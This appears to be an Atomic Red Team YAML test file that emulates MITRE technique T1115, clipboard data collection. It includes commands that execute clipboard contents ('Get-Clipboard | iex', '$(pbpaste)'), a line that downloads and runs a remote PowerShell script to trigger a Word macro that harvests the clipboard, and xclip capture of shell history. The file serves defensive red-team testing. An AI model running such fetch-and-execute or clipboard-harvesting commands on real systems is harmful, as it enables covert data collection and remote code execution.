attack_technique: T1115
display_name: Clipboard Data
atomic_tests:
- name: Utilize Clipboard to store or execute commands from
  auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
  description: |
    Add data to clipboard to copy off or execute commands from.
  supported_platforms:
  - windows
  executor:
    command: |
      dir | clip
      echo "T1115" > %temp%\T1115.txt
      clip < %temp%\T1115.txt
    cleanup_command: |
      del %temp%\T1115.txt >nul 2>&1
    name: command_prompt
- name: Execute Commands from Clipboard using PowerShell
  auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
  description: |
    Utilize PowerShell to echo a command to clipboard and execute it
  supported_platforms:
  - windows
  executor:
    command: |
      echo Get-Process | clip
      Get-Clipboard | iex
    name: powershell
- name: Execute commands from clipboard
  auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
  description: Echo a command to clipboard and execute it
  supported_platforms:
  - macos
  executor:
    command: |-
      echo ifconfig | pbcopy
      $(pbpaste)
    name: bash
- name: Collect Clipboard Data via VBA
  auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
  description: |
    This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
  supported_platforms:
  - windows
  input_arguments:
    ms_product:
      description: Maldoc application Word
      type: string
      default: Word
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft #{ms_product} must be installed
    prereq_command: |
      try {
        New-Object -COMObject "#{ms_product}.Application" | Out-Null
        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
        Stop-Process -Name $process
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
    cleanup_command: |
      Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
    name: powershell
- name: Add or copy content to clipboard with xClip
  auto_generated_guid: ee363e53-b083-4230-aff3-f8d955f2d5bb
  description: |
    Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
  supported_platforms:
  - linux
  executor:
    command: |
      apt install xclip -y
      history | tail -n 30 | xclip -sel clip
      xclip -o > history.txt
    name: sh